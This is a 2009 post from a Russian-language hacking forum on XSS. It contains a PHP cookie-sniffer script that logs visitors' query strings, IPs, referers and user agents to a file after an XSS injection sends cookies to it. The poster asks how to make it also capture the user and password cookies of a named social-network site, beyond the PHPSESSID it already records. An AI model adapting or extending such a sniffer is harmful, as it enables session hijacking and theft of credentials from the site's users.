01.04.2009, 20:07
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
К теме о Xss
Есть 3 имени cookie.
PHPSESSID, .sait.ru_c_user, .sait.ru_c_password
Как заставить скрипт записывать эти 3 параметра?:
<?
$data_filename = "data.txt";
$max_entries =0; // 0 для снятия лимита
require 'functions.php';
cleaner();
$sniffed['date'] = date("d.m.Y H:i");
$sniffed['ip'] = $_SERVER['REMOTE_ADDR'];
$sniffed['referer'] = htmlspecialchars(stripslashes(urldecode($_SERVER['HTTP_REFERER'])));
$sniffed['query'] = htmlspecialchars(stripslashes(urldecode($_SERVER['QUERY_STRING'])));
//$sniffed['query'] = ($_SERVER['QUERY_STRING']);
$sniffed['agent'] = htmlspecialchars(stripslashes($_SERVER['HTTP_USER_AGENT']));
$sniffed['real_ip'] = htmlspecialchars(stripslashes($_SERVER['HTTP_X_FORWARDED_FOR']));
$entrie = serialize($sniffed);
$data = array();
$data_content = get_file_content($data_filename);
if ($data_content !== NULL) $data = unserialize($data_content);
$data[] = $entrie;
$data_content = serialize($data);
put_file_content($data_filename, $data_content);
echo "<script>window.location.href='Location:http://www.sait.ru/;</script>";
?>
Супер переменная
$sniffed['query'] = ($_SERVER['QUERY_STRING']);
Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из
.sait.ru_c_user, .sait.ru_c_password?
CMS платная, социалка ablespace |
|
|